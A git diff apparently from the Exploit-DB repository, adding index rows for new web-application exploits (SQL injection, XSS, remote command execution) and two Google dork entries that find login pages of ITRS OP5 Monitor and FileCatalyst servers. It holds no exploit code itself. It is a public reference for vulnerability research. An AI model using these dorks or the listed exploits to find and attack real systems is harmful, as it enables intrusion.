Hartsuyeu",webapps,php,,2006-02-15,2013-07-31,1,,,,,,https://www.securityfocus.com/bid/16680/info 29910,exploits/php/webapps/29910.txt,"HTMLEditBox 2.2 - 'config.php' Remote File Inclusion",2007-04-25,alijsb,webapps,php,,2007-04-25,2013-11-29,1,CVE-2007-2327;OSVDB-35525,,,,,https://www.securityfocus.com/bid/23664/info 22896,exploits/php/webapps/22896.txt,"HTMLToNuke - Cross-Site Scripting",2003-07-13,JOCANOR,webapps,php,,2003-07-13,2012-11-22,1,,,,,,https://www.securityfocus.com/bid/8174/info +51979,exploits/php/webapps/51979.txt,"HTMLy Version v2.9.6 - Stored XSS",2024-04-12,tmrswrr,webapps,php,,2024-04-12,2024-04-12,0,,,,,, 2791,exploits/php/webapps/2791.txt,"HTTP Upload Tool - 'download.php' Information Disclosure",2006-11-16,"Craig Heffner",webapps,php,,2006-11-15,2016-09-16,1,CVE-2006-7134,,,,http://www.exploit-db.comupload.tar.gz, 46149,exploits/php/webapps/46149.html,"Hucart CMS 5.7.4 - Cross-Site Request Forgery (Add Administrator Account)",2019-01-14,AllenChen,webapps,php,,2019-01-14,2019-01-14,0,CVE-2019-6249,"Cross-Site Request Forgery (CSRF)",,,http://www.exploit-db.comGV32-CMS_v5.7.4.zip, 32047,exploits/php/webapps/32047.txt,"Hudson 1.223 - 'q' Cross-Site Scripting",2008-07-11,syniack,webapps,php,,2008-07-11,2014-03-04,1,,,,,,https://www.securityfocus.com/bid/30184/info @@ -23754,6 +23759,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 36418,exploits/php/webapps/36418.txt,"Moodle 2.5.9/2.6.8/2.7.5/2.8.3 - Block Title Handler Cross-Site Scripting",2015-03-17,LiquidWorm,webapps,php,,2015-03-17,2015-03-17,0,CVE-2015-2269;OSVDB-119617,,,,,http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5236.php 34169,exploits/php/webapps/34169.txt,"Moodle 2.7 - Persistent Cross-Site Scripting",2014-07-27,"Osanda Malith Jayathissa",webapps,php,,2014-07-27,2014-07-27,0,CVE-2014-3544;OSVDB-109337,,,,,https://moodle.org/mod/forum/discuss.php?d=264265 41828,exploits/php/webapps/41828.php,"Moodle 2.x/3.x - SQL Injection",2017-04-06,"Marko Belzetski",webapps,php,,2017-04-06,2017-04-06,0,CVE-2017-2641,,,,, +51984,exploits/php/webapps/51984.py,"Moodle 3.10.1 - Authenticated Blind Time-Based SQL Injection - _sort_ parameter",2024-04-12,"Julio Ángel Ferrari",webapps,php,,2024-04-12,2024-04-12,0,,,,,, 49714,exploits/php/webapps/49714.txt,"Moodle 3.10.3 - 'label' Persistent Cross Site Scripting",2021-03-26,Vincent666,webapps,php,,2021-03-26,2021-03-26,0,,,,,, 49797,exploits/php/webapps/49797.txt,"Moodle 3.10.3 - 'url' Persistent Cross Site Scripting",2021-04-23,UVision,webapps,php,,2021-04-23,2021-04-23,0,,,,,, 50700,exploits/php/webapps/50700.txt,"Moodle 3.11.4 - SQL Injection",2022-02-02,lavclash75,webapps,php,,2022-02-02,2022-02-02,0,CVE-2022-0332,,,,, @@ -24928,6 +24934,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 5889,exploits/php/webapps/5889.txt,"Online Fantasy Football League (OFFL) 0.2.6 - 'teams.php' SQL Injection",2008-06-21,t0pP8uZz,webapps,php,,2008-06-20,2016-12-09,1,OSVDB-46485;CVE-2008-2890;OSVDB-46484;OSVDB-46483,,,,http://www.exploit-db.comoffl-0.2.6.zip, 4374,exploits/php/webapps/4374.txt,"Online Fantasy Football League (OFFL) 0.2.6 - Remote File Inclusion",2007-09-07,MhZ91,webapps,php,,2007-09-06,2016-10-12,1,OSVDB-36944;CVE-2007-4809;OSVDB-36943,,,,http://www.exploit-db.comoffl-0.2.6.zip, 48673,exploits/php/webapps/48673.txt,"Online Farm Management System 0.1.0 - Persistent Cross-Site Scripting",2020-07-15,KeopssGroup0day_Inc,webapps,php,,2020-07-15,2020-07-15,0,,,,,, +51989,exploits/php/webapps/51989.txt,"Online Fire Reporting System OFRS - SQL Injection Authentication Bypass",2024-04-13,"Diyar Saadi",webapps,php,,2024-04-13,2024-04-13,0,,,,,, 41029,exploits/php/webapps/41029.txt,"Online Food Delivery 2.04 - Authentication Bypass",2017-01-12,"Dawid Morawski",webapps,php,,2017-01-12,2017-01-12,0,,,,,, 48827,exploits/php/webapps/48827.txt,"Online Food Ordering System 1.0 - Remote Code Execution",2020-09-23,"Eren Şimşek",webapps,php,,2020-09-23,2020-09-23,0,,,,,, 50305,exploits/php/webapps/50305.py,"Online Food Ordering System 2.0 - Remote Code Execution (RCE) (Unauthenticated)",2021-09-20,"Abdullah Khawaja",webapps,php,,2021-09-20,2021-09-20,0,,,,,, @@ -28097,6 +28104,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 5788,exploits/php/webapps/5788.txt,"Pooya Site Builder (PSB) 6.0 - Multiple SQL Injections",2008-06-11,BugReport.IR,webapps,php,,2008-06-10,,1,OSVDB-46100;CVE-2008-2753;OSVDB-46099;OSVDB-46098,,,,,http://www.bugreport.ir/?/42 3121,exploits/php/webapps/3121.txt,"Poplar Gedcom Viewer 2.0 - 'common.php' Remote File Inclusion",2007-01-12,GoLd_M,webapps,php,,2007-01-11,,1,OSVDB-32807;CVE-2007-0307,,,,, 31605,exploits/php/webapps/31605.txt,"Poplar Gedcom Viewer 2.0 - Search Page Multiple Cross-Site Scripting Vulnerabilities",2008-04-04,ZoRLu,webapps,php,,2008-04-04,2014-02-12,1,CVE-2008-1787;OSVDB-44403,,,,,https://www.securityfocus.com/bid/28608/info +51982,exploits/php/webapps/51982.txt,"PopojiCMS Version 2.0.1 - Remote Command Execution",2024-04-12,tmrswrr,webapps,php,,2024-04-12,2024-04-12,0,,,,,, 4481,exploits/php/webapps/4481.txt,"Poppawid 2.7 - 'form' Remote File Inclusion",2007-10-02,0in,webapps,php,,2007-10-01,2016-10-12,1,OSVDB-37422;CVE-2007-5221,,,,http://www.exploit-db.compoppawid.2.7.tar.gz, 2351,exploits/php/webapps/2351.txt,"Popper 1.41-r2 - 'form' Remote File Inclusion",2006-09-12,SHiKaA,webapps,php,,2006-09-11,2016-09-09,1,,,,,http://www.exploit-db.compopper-1.41-r2.tar.gz, 25788,exploits/php/webapps/25788.txt,"Popper Webmail 1.41 - 'ChildWindow.Inc.php' Remote File Inclusion",2005-06-03,"Leon Juranic",webapps,php,,2005-06-03,2013-05-28,1,CVE-2005-1870;OSVDB-17085,,,,,https://www.securityfocus.com/bid/13851/info @@ -28659,7 +28667,6 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 31481,exploits/php/webapps/31481.txt,"Quick Classifieds 1.0 - 'search_results.php3?DOCUMENT_ROOT' Remote File Inclusion",2008-03-24,ZoRLu,webapps,php,,2008-03-24,2014-02-07,1,CVE-2008-6543;OSVDB-53025,,,,,https://www.securityfocus.com/bid/28417/info 31514,exploits/php/webapps/31514.txt,"Quick Classifieds 1.0 - 'style/default.scheme.inc?DOCUMENT_ROOT' Remote File Inclusion",2008-03-24,ZoRLu,webapps,php,,2008-03-24,2014-02-07,1,CVE-2008-6543;OSVDB-53058,,,,,https://www.securityfocus.com/bid/28417/info 32387,exploits/php/webapps/32387.txt,"Quick CMS Lite 2.1 - 'admin.php' Cross-Site Scripting",2008-09-16,"John Cobb",webapps,php,,2008-09-16,2014-03-20,1,CVE-2008-4139;OSVDB-48135,,,,,https://www.securityfocus.com/bid/31210/info -51967,exploits/php/webapps/51967.txt,"Quick CMS v6.7 en 2023 - 'password' SQLi",2024-04-03,nu11secur1ty,webapps,php,,2024-04-03,2024-04-03,0,,,,,, 45698,exploits/php/webapps/45698.txt,"Quick Count 2.0 - 'txtInstID' SQL Injection",2018-10-26,"Ihsan Sencan",webapps,php,,2018-10-26,2018-10-26,0,,,,,http://www.exploit-db.comQCLxDwn_200.zip, 10837,exploits/php/webapps/10837.txt,"Quick Poll - 'code.php?id' SQL Injection",2009-12-31,"Hussin X",webapps,php,,2009-12-30,,1,,,,,, 7105,exploits/php/webapps/7105.txt,"Quick Poll Script - 'id' SQL Injection",2008-11-12,"Hussin X",webapps,php,,2008-11-11,2017-01-02,1,OSVDB-47814;CVE-2008-3765,,,,, @@ -29244,6 +29251,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 48658,exploits/php/webapps/48658.txt,"Savsoft Quiz 5 - Persistent Cross-Site Scripting",2020-07-09,th3d1gger,webapps,php,,2020-07-09,2020-07-09,0,,,,,, 48753,exploits/php/webapps/48753.txt,"Savsoft Quiz 5 - Stored Cross-Site Scripting",2020-08-18,"Mayur Parmar",webapps,php,,2020-08-18,2020-08-26,0,CVE-2020-24609,,,,, 48785,exploits/php/webapps/48785.txt,"Savsoft Quiz Enterprise Version 5.5 - Persistent Cross-Site Scripting",2020-09-03,"Hemant Patidar",webapps,php,,2020-09-03,2020-12-03,0,CVE-2020-24609,,,,, +51988,exploits/php/webapps/51988.txt,"Savsoft Quiz v6.0 Enterprise - Stored XSS",2024-04-13,"Eren Sen",webapps,php,,2024-04-13,2024-04-13,0,,,,,, 30719,exploits/php/webapps/30719.txt,"Saxon 5.4 - 'Example.php' SQL Injection",2007-10-29,netVigilance,webapps,php,,2007-10-29,2014-01-06,1,CVE-2007-4863;OSVDB-38839,,,,,https://www.securityfocus.com/bid/26238/info 30718,exploits/php/webapps/30718.txt,"Saxon 5.4 - 'Menu.php' Cross-Site Scripting",2007-10-29,netVigilance,webapps,php,,2007-10-29,2014-01-06,1,CVE-2007-4862;OSVDB-38287,,,,,https://www.securityfocus.com/bid/26237/info 2718,exploits/php/webapps/2718.txt,"SazCart 1.5 - 'cart.php' Remote File Inclusion",2006-11-04,IbnuSina,webapps,php,,2006-11-03,2016-11-28,1,OSVDB-30194;CVE-2006-5727,,,,, @@ -29453,7 +29461,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 35197,exploits/php/webapps/35197.txt,"Serenity Client Management Portal 1.0.1 - Multiple Vulnerabilities",2014-11-10,"Halil Dalabasmaz",webapps,php,,2014-11-12,2014-11-12,0,OSVDB-114661;OSVDB-114660,,,,, 45817,exploits/php/webapps/45817.txt,"ServerZilla 1.0 - 'email' SQL Injection",2018-11-12,"Ihsan Sencan",webapps,php,80,2018-11-12,2018-11-13,0,,"SQL Injection (SQLi)",,,http://www.exploit-db.comServerZilla_src.zip, 10938,exploits/php/webapps/10938.txt,"Service d'upload 1.0.0 - Arbitrary File Upload",2010-01-03,indoushka,webapps,php,,2010-01-02,,0,,,,,, -51482,exploits/php/webapps/51482.txt,"Service Provider Management System v1.0 - SQL Injection",2023-05-24,"ASHIK KUNJUMON",webapps,php,,2023-05-24,2023-05-31,1,CVE-2023-2769,,,,, +51482,exploits/php/webapps/51482.txt,"Service Provider Management System v1.0 - SQL Injection",2023-05-24,"ASHIK KUNJUMON",webapps,php,,2023-05-24,2024-04-12,1,CVE-2023-34581,,,,, 4089,exploits/php/webapps/4089.pl,"SerWeb 0.9.4 - 'load_lang.php' Remote File Inclusion",2007-06-21,Kw3[R]Ln,webapps,php,,2007-06-20,2016-10-05,1,OSVDB-36324;CVE-2007-3358,,,,http://www.exploit-db.comserweb-0.9.4.tar.gz, 4696,exploits/php/webapps/4696.txt,"SerWeb 2.0.0 dev1 2007-02-20 - Multiple Local/Remote File Inclusion Vulnerabilities",2007-12-06,GoLd_M,webapps,php,,2007-12-05,,1,OSVDB-39220;CVE-2007-6290;OSVDB-39219;CVE-2007-6289;OSVDB-39218;OSVDB-39217,,,,, 9284,exploits/php/webapps/9284.txt,"SerWeb 2.1.0-dev1 2009-07-02 - Multiple Remote File Inclusions",2009-07-27,GoLd_M,webapps,php,,2009-07-26,,1,,,,,, @@ -30381,6 +30389,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 49994,exploits/php/webapps/49994.txt,"Stock Management System 1.0 - 'user_id' Blind SQL injection (Authenticated)",2021-06-14,"Riadh Benlamine",webapps,php,,2021-06-14,2021-06-14,0,,,,,, 48733,exploits/php/webapps/48733.txt,"Stock Management System 1.0 - Authentication Bypass",2020-08-05,"Adeeb Shah",webapps,php,,2020-08-05,2020-08-05,0,,,,,, 48783,exploits/php/webapps/48783.txt,"Stock Management System 1.0 - Cross-Site Request Forgery (Change Username)",2020-09-02,boku,webapps,php,,2020-09-02,2020-09-02,0,,,,,, +51990,exploits/php/webapps/51990.py,"Stock Management System v1.0 - Unauthenticated SQL Injection",2024-04-13,blu3ming,webapps,php,,2024-04-13,2024-04-13,0,,,,,, 42768,exploits/php/webapps/42768.pl,"Stock Photo Selling 1.0 - SQL Injection",2017-09-22,"Ihsan Sencan",webapps,php,,2017-09-22,2017-09-22,0,,,,,, 50348,exploits/php/webapps/50348.py,"Storage Unit Rental Management System 1.0 - Remote Code Execution (RCE) (Unauthenticated)",2021-09-29,Ghuliev,webapps,php,,2021-09-29,2021-09-29,0,,,,,, 13813,exploits/php/webapps/13813.html,"Store Locator - Cross-Site Request Forgery (Add Admin)",2010-06-10,JaMbA,webapps,php,,2010-06-09,,1,,,,,, @@ -32181,10 +32190,12 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 10632,exploits/php/webapps/10632.pl,"Wbb3 - Blind SQL Injection",2009-12-24,molli,webapps,php,,2009-12-23,,0,,,,,, 8254,exploits/php/webapps/8254.pl,"WBB3 rGallery 1.2.3 - 'UserGallery' Blind SQL Injection",2009-03-23,Invisibility,webapps,php,,2009-03-22,,1,OSVDB-55535;CVE-2009-2311,,,,, 3490,exploits/php/webapps/3490.txt,"wbblog - Cross-Site Scripting / SQL Injection",2007-03-15,"Mehmet Ince",webapps,php,,2007-03-14,,1,OSVDB-34183;CVE-2007-1482;OSVDB-34182;CVE-2007-1481,,,,, +51985,exploits/php/webapps/51985.txt,"WBCE 1.6.0 - Unauthenticated SQL injection",2024-04-12,"young pope",webapps,php,,2024-04-12,2024-04-12,0,,,,,, 50609,exploits/php/webapps/50609.py,"WBCE CMS 1.5.1 - Admin Password Reset",2021-12-20,citril,webapps,php,,2021-12-20,2021-12-20,0,CVE-2021-3817,,,,, 50707,exploits/php/webapps/50707.py,"WBCE CMS 1.5.2 - Remote Code Execution (RCE) (Authenticated)",2022-02-04,"Antonio Cuomo",webapps,php,,2022-02-04,2022-02-04,0,,,,,, 51484,exploits/php/webapps/51484.txt,"WBCE CMS 1.6.1 - Multiple Stored Cross-Site Scripting (XSS)",2023-05-25,"Mirabbas Ağalarov",webapps,php,,2023-05-25,2023-05-25,1,,,,,, 51566,exploits/php/webapps/51566.txt,"WBCE CMS 1.6.1 - Open Redirect & CSRF",2023-07-03,"Mirabbas Ağalarov",webapps,php,,2023-07-03,2023-07-03,0,,,,,, +51986,exploits/php/webapps/51986.txt,"WBCE CMS Version 1.6.1 - Remote Command Execution (Authenticated)",2024-04-12,tmrswrr,webapps,php,,2024-04-12,2024-04-12,0,,,,,, 51451,exploits/php/webapps/51451.txt,"WBiz Desk 1.2 - SQL Injection",2023-05-23,h4ck3r,webapps,php,,2023-05-23,2023-05-23,0,,,,,, 7337,exploits/php/webapps/7337.txt,"wbstreet 1.0 - SQL Injection / File Disclosure",2008-12-04,"CWH Underground",webapps,php,,2008-12-03,,1,OSVDB-51579;CVE-2008-5956;OSVDB-51575;CVE-2008-5955;OSVDB-50445;OSVDB-50444,,,,, 43864,exploits/php/webapps/43864.txt,"Wchat 1.5 - SQL Injection",2018-01-23,"Ihsan Sencan",webapps,php,,2018-01-23,2018-01-23,0,CVE-2018-5979,,,,, @@ -33517,6 +33528,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 35562,exploits/php/webapps/35562.txt,"WordPress Plugin Placester 0.1 - 'ajax_action' Cross-Site Scripting",2011-04-03,"John Leitch",webapps,php,,2011-04-03,2014-12-17,1,,"WordPress Plugin",,,,https://www.securityfocus.com/bid/47142/info 45274,exploits/php/webapps/45274.html,"WordPress Plugin Plainview Activity Monitor 20161228 - (Authenticated) Command Injection",2018-08-27,"Lydéric Lefebvre",webapps,php,80,2018-08-27,2018-08-28,1,CVE-2018-15877,"Command Injection",,http://www.exploit-db.com/screenshots/idlt45500/45274.png,http://www.exploit-db.complainview-activity-monitor.20161228.zip, 50110,exploits/php/webapps/50110.py,"WordPress Plugin Plainview Activity Monitor 20161228 - Remote Code Execution (RCE) (Authenticated) (2)",2021-07-07,"Beren Kuday GÖRÜN",webapps,php,,2021-07-07,2021-07-07,0,CVE-2018-15877,,,,http://www.exploit-db.complainview-activity-monitor.20161228.zip, +51981,exploits/php/webapps/51981.txt,"Wordpress Plugin Playlist for Youtube 1.32 - Stored Cross-Site Scripting (XSS)",2024-04-12,Erdemstar,webapps,php,,2024-04-12,2024-04-12,0,,,,,, 38048,exploits/php/webapps/38048.txt,"WordPress Plugin Plg Novana - 'id' SQL Injection",2012-11-22,sil3nt,webapps,php,,2012-11-22,2015-09-01,1,OSVDB-87839,"WordPress Plugin",,,,https://www.securityfocus.com/bid/56661/info 38376,exploits/php/webapps/38376.txt,"WordPress Plugin podPress - 'playerID' Cross-Site Scripting",2013-03-11,hiphop,webapps,php,,2013-03-11,2015-10-01,1,CVE-2013-2714;OSVDB-91129,"WordPress Plugin",,,,https://www.securityfocus.com/bid/58421/info 50052,exploits/php/webapps/50052.txt,"WordPress Plugin Poll_ Survey_ Questionnaire and Voting system 1.5.2 - 'date_answers' Blind SQL Injection",2021-06-23,"Toby Jackson",webapps,php,,2021-06-23,2021-06-23,0,,,,,http://www.exploit-db.compolls-widget.1.5.2.zip, @@ -33923,6 +33935,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 50772,exploits/php/webapps/50772.py,"WordPress Plugin WP User Frontend 3.5.25 - SQLi (Authenticated)",2022-02-21,"Ron Jost",webapps,php,,2022-02-21,2022-02-21,0,CVE-2021-25076,,,,http://www.exploit-db.comwp-user-frontend.3.5.25.zip, 39422,exploits/php/webapps/39422.py,"WordPress Plugin WP User Frontend < 2.3.11 - Unrestricted Arbitrary File Upload",2016-02-08,"Panagiotis Vagenas",webapps,php,80,2016-02-08,2016-02-08,0,,"WordPress Plugin",,,, 40850,exploits/php/webapps/40850.txt,"WordPress Plugin WP Vault 0.8.6.6 - Local File Inclusion",2016-11-30,"Lenon Leite",webapps,php,,2016-11-30,2016-11-30,1,,,,http://www.exploit-db.com/screenshots/idlt41000/screen-shot-2016-11-30-at-191812.png,http://www.exploit-db.comwp-vault.0.8.6.6.zip, +51987,exploits/php/webapps/51987.txt,"Wordpress Plugin WP Video Playlist 1.1.1 - Stored Cross-Site Scripting (XSS)",2024-04-12,Erdemstar,webapps,php,,2024-04-12,2024-04-12,0,,,,,, 50619,exploits/php/webapps/50619.py,"WordPress Plugin WP Visitor Statistics 4.7 - SQL Injection",2022-01-05,"Ron Jost",webapps,php,,2022-01-05,2022-01-05,0,CVE-2021-24750,,,,http://www.exploit-db.comwp-stats-manager.4.7.zip, 44544,exploits/php/webapps/44544.php,"WordPress Plugin WP with Spritz 1.0 - Remote File Inclusion",2018-04-26,Wadeek,webapps,php,,2018-04-26,2018-04-26,0,,,,,http://www.exploit-db.comwp-with-spritz.zip, 18353,exploits/php/webapps/18353.txt,"WordPress Plugin wp-autoyoutube - Blind SQL Injection",2012-01-12,longrifle0x,webapps,php,,2012-01-12,2012-06-22,0,OSVDB-82542,"WordPress Plugin",,,http://www.exploit-db.comwp-autoyoutube.0.1.zip, @@ -34912,6 +34925,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 51532,exploits/python/webapps/51532.py,"PyLoad 0.5.0 - Pre-auth Remote Code Execution (RCE)",2023-06-14,"Gabriel Lima",webapps,python,,2023-06-20,2023-06-20,1,CVE-2023-0297,,,,, 39199,exploits/python/webapps/39199.html,"Pyplate - 'addScript.py' Cross-Site Request Forgery",2014-05-23,"Henri Salo",webapps,python,,2014-05-23,2016-01-08,1,CVE-2014-3854;OSVDB-107099,,,,,https://www.securityfocus.com/bid/67610/info 51669,exploits/python/webapps/51669.txt,"Pyro CMS 3.9 - Server-Side Template Injection (SSTI) (Authenticated)",2023-08-08,"Daniel Barros",webapps,python,,2023-08-08,2023-08-08,0,CVE-2023-29689,,,,, +51978,exploits/python/webapps/51978.txt,"Ray OS v2.6.3 - Command Injection RCE(Unauthorized)",2024-04-12,Fire_Wolf,webapps,python,,2024-04-12,2024-04-12,0,CVE-2023-6019,,,,, 51226,exploits/python/webapps/51226.txt,"Roxy WI v6.1.0.0 - Improper Authentication Control",2023-04-03,"Nuri Çilengir",webapps,python,,2023-04-03,2023-05-24,1,CVE-2022-31125,,,,, 51227,exploits/python/webapps/51227.txt,"Roxy WI v6.1.0.0 - Unauthenticated Remote Code Execution (RCE)",2023-04-03,"Nuri Çilengir",webapps,python,,2023-04-03,2023-06-04,1,CVE-2022-31126,,,,, 51228,exploits/python/webapps/51228.txt,"Roxy WI v6.1.1.0 - Unauthenticated Remote Code Execution (RCE) via ssl_cert Upload",2023-04-03,"Nuri Çilengir",webapps,python,,2023-04-03,2023-04-03,0,CVE-2022-31161,,,,, @@ -46391,6 +46405,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 39520,exploits/windows_x86-64/local/39520.txt,"Secret Net 7 and Secret Net Studio 8 - Local Privilege Escalation",2016-03-02,Cr4sh,local,windows_x86-64,,2016-03-02,2016-03-02,0,,,,,,https://github.com/Cr4sh/secretnet_expl 40451,exploits/windows_x86-64/local/40451.rb,"Street Fighter 5 - 'Capcom.sys' Kernel Execution (Metasploit)",2016-10-03,"OJ Reeves",local,windows_x86-64,,2016-10-03,2016-10-03,1,,"Metasploit Framework (MSF)",,,, 40342,exploits/windows_x86-64/local/40342.py,"TeamViewer 11.0.65452 (x64) - Local Credentials Disclosure",2016-09-07,"Alexander Korznikov",local,windows_x86-64,,2016-09-07,2016-09-07,0,,,,,, +51977,exploits/windows_x86-64/local/51977.txt,"Terratec dmx_6fire USB - Unquoted Service Path",2024-04-12,"Joseph Kwabena Fiagbor",local,windows_x86-64,,2024-04-12,2024-04-12,0,CVE-2024-31804,,,,, 51843,exploits/windows_x86-64/local/51843.txt,"Windows PowerShell - Event Log Bypass Single Quote Code Execution",2024-03-03,hyp3rlinx,local,windows_x86-64,,2024-03-03,2024-03-03,0,,,,,, 45197,exploits/windows_x86-64/remote/45197.rb,"Cloudme 1.9 - Buffer Overflow (DEP) (Metasploit)",2018-08-14,"Raymond Wellnitz",remote,windows_x86-64,,2018-08-14,2018-08-14,0,CVE-2018-6892,,,,, 46250,exploits/windows_x86-64/remote/46250.py,"CloudMe Sync 1.11.2 Buffer Overflow - WoW64 (DEP Bypass)",2019-01-28,"Matteo Malvica",remote,windows_x86-64,,2019-01-28,2019-01-29,0,CVE-2018-6892,Remote,,,http://www.exploit-db.comCloudMe_1112.exe, diff --git a/ghdb.xml b/ghdb.xml index dde30f2f51..67df073c95 100644 --- a/ghdb.xml +++ b/ghdb.xml @@ -116386,6 +116386,26 @@ PsyDel 2024-02-06 Thomas Heverin + + 8426 + https://www.exploit-db.com/ghdb/8426 + Vulnerable Servers + allintitle:"ITRS OP5 Monitor" + Dear Off Sec Team, + +Here is a new Google Dork: + +#GoogleDork allintitle:"ITRS OP5 Monitor" +#Description login pages for network monitoring devices +#Author *Girls Learn Cyber* +#Date 4/12/2024 + + allintitle:"ITRS OP5 Monitor" + https://www.google.com/search?q=allintitle:"ITRS OP5 Monitor" + + 2024-04-13 + Thomas Heverin + 388 https://www.exploit-db.com/ghdb/388 @@ -116885,6 +116905,22 @@ Ingeniero Civil en Inform�tica. 2012-05-15 anonymous + + 8425 + https://www.exploit-db.com/ghdb/8425 + Vulnerable Servers + intitle:"FileCatalyst file transfer solution" + # Google Dork: intitle:"FileCatalyst file transfer solution" +# Files Containing Juicy Info +# Date: 19/03/2024 +# Exploit Kamran Saifullah + + intitle:"FileCatalyst file transfer solution" + https://www.google.com/search?q=intitle:"FileCatalyst file transfer solution" + + 2024-04-13 + Kamran Saifullah + 192 https://www.exploit-db.com/ghdb/192